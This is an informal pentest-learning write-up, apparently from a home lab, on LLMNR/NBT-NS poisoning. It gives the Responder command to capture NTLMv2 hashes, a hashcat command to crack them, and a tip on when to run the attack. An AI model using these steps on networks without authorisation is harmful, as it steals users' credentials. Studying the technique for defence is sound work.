The LLMNR Poisoning
In summary : Well it's a MITM nothing else.
Yup that’s it man in the middle nothing else, just your old school mitm.
Basically, Link-Local Multicast Name Resolution or LLMNR/NBT-NS is used to identify a host when DNS fails. LLMNR explained in 4 simple steps:
STEP 1 : Suppose you want to go to the fileshare for your salary slip or maybe some 1337 docs that you require, so what will happen is when try to go there your local hostfile will be checked for suitable records. But sadly, its IP is not present there.
STEP 2: Your machine will now look for it in DNS cache sadly it’s not there.
STEP 3: At this point your machine is grilled AF, it needs results now ASAP, so it requests for it from DNS server. But DNS is like who is this man, never seen him before.
STEP 4: Last resort machine sends a multicast query, asking other machines in the network for fileshare‘s IP address.
But AD is supposed to be secure, right? They must have their ZERO TRUST shit on right? WRONG
LLMNR broadcasts query to the whole network, but no measures are taken to verify the integrity of the responses. Here comes the good part
LLMNR Poisoning in 3 simple steps:
Step 1 : Turn on Responder you can do this by running
“ python Responder.py -I eth0 -rdw”
Responder is LLMNR, NBT-NS and MDNS poisoner. You can get it from here. In the above command I’ve used eth0 as my interface as I’m running this in my home lab. It’s from TCM’s peh course. After running the above command, you will get something like this
STEP 2 : Now wait for victim to send the request. He may need the fileshare we talked about. On his side, it would look something like this
For you now capture the hash, and you got and save it. It would look like this on your side/attacker side
STEP 3 : Crack the hash with hashcat or tool of your choice. For hashcat you can run the following command
“hashcat.exe -m 5600 hash1.txt rockyou.txt -O”
And it’s done, I got Password1
TIP: The Best time to run Responder is beginning of the day or after lunch.
